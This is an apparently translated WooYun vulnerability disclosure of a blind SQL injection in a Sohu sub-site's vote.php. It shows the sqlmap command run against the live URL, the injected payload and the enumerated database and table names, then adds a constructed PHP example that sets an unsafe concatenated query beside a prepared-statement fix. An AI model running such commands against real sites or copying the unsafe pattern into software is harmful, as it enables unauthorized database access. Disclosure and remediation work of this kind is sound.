
Vulnerability summary

Defect ID: wooyun-2013-035455

Title: SQL injection on a Sohu sub-site, part three (large amount of data)

Vendor: Sohu

Author: feng

Submitted: 2013-08-28 09:02

Fixed: 2013-10-12 09:03

Published: 2013-10-12 09:03

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org, for questions or help please contact [email protected]



Vulnerability details

Disclosure status:

2013-08-28: Details sent to the vendor, awaiting vendor response
2013-08-29: Vendor confirmed; details disclosed to the vendor only
2013-09-08: Details disclosed to core white hats and domain experts
2013-09-18: Details disclosed to regular white hats
2013-09-28: Details disclosed to intern white hats
2013-10-12: Details disclosed to the public

Brief description:

SQL injection on a Sohu sub-site, part three (large amount of data)

Detailed description:

[root@Hacker~]# Sqlmap -u "http://product.it.sohu.com/core/vote.php" --data "action=comment&pid=344043&vote=vote4&page="
Place: POST
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=comment&pid=344043 AND 2254=2254&vote=vote4&page=
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0

Proof of vulnerability:

At the vendor's request no data is leaked; database and table names are posted as proof.
available databases [7]:
[*] act
[*] down
[*] information_schema
[*] stock
[*] t
[*] tv
[*] zoldb
Database: tv
[17 tables]
+---------------------------------------+
| area |
| article |
| category |
| counts |
| evaluate_result |
| evaluates |
| manufacturer |
| merchant |
| merchant_area |
| param_category |
| params |
| product_param |
| product_param_bac |
| product_property |
| products |
| serials |
| sys_user |
+---------------------------------------+
Database: down
[36 tables]
+---------------------------------------+
| x_adaptprojects |
| x_backyard_downediting |
| x_backyard_groups |
| x_backyard_logs |
| x_backyard_sessions |
| x_backyard_users |
| x_cates |
| x_channels |
| x_dev_accesslog |
| x_dev_keyvalue |
| x_developers |
| x_downfields |
| x_downhistories |
| x_downpushs |
| x_downrelates |
| x_downs |
| x_files |
| x_groups |
| x_images |
| x_languages |
| x_mobiles |
| x_mobiles_useragent |
| x_mtc_users |
| x_pages |
| x_projects |
| x_rates |
| x_reports |
| x_reporttypes |
| x_sessions |
| x_sets |
| x_stats_5m |
| x_stats_agent |
| x_stats_day |
| x_stats_day_channel |
| x_stats_search |
| x_vendors |
+---------------------------------------+
Database: t
[6 tables]
+---------------------------------------+
| stat_user_byday |
| sync_job |
| sync_queue |
| sync_sina_media |
| sync_sina_t |
| sync_sina_user |
+---------------------------------------+

Fix recommendation:

You're the professionals.
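The report shows a boolean-based blind injection through the POST parameter pid of vote.php (the injected condition `AND 2254=2254` is what sqlmap uses to tell a true response from a false one). The source of vote.php is not on this page, so the snippet below is an added, constructed illustration, not Sohu's code: it puts the pattern that produces this class of bug next to the fix a defender would apply. The table name `votes`, the column `pid`, the PDO credentials and the database name are assumptions chosen for the example.

```php
<?php
// Added example, not the original vote.php (its source is not on the page).
// The table "votes", its column "pid", and the connection details below are
// constructed for illustration only.

// Constructed vulnerable pattern: the pid value is concatenated into the SQL
// text, so a value such as "344043 AND 2254=2254" becomes part of the WHERE
// clause and the response differs depending on whether the appended condition
// is true or false. That difference is all a boolean-based blind probe needs.
function countVotesUnsafe(PDO $pdo, string $pid): int
{
    $sql = "SELECT COUNT(*) FROM votes WHERE pid = " . $pid;
    return (int) $pdo->query($sql)->fetchColumn();
}

// Hardened form: reject anything that is not a plain integer, then bind the
// value as a typed parameter of a server-side prepared statement, so the
// database never parses user input as SQL.
function countVotesSafe(PDO $pdo, string $pid): int
{
    if (!ctype_digit($pid) || strlen($pid) > 10) {
        http_response_code(400);
        exit('invalid pid');
    }
    $stmt = $pdo->prepare('SELECT COUNT(*) FROM votes WHERE pid = :pid');
    $stmt->bindValue(':pid', (int) $pid, PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Usage: pid arrives in the POST body, as in the report. Connection values are
// placeholders (the DSN, user and password are not from the page).
$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=tv;charset=utf8mb4',
    'app_user',
    'app_password',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side escaping
    ]
);

$pid = isset($_POST['pid']) ? (string) $_POST['pid'] : '';
echo countVotesSafe($pdo, $pid);
```

Disabling emulated prepares matters here: with emulation on, PDO builds the query string client-side, so the protection rests on escaping rather than on the server treating the bound value purely as data. The integer check before binding is belt and braces; it also gives a cheap 400 response to probes like the one in the report instead of a database round trip.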

Copyright notice: please credit the source when reposting, feng@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-08-29 00:13

Vendor reply:

Thanks for the support. ^_^

Latest status:

None yet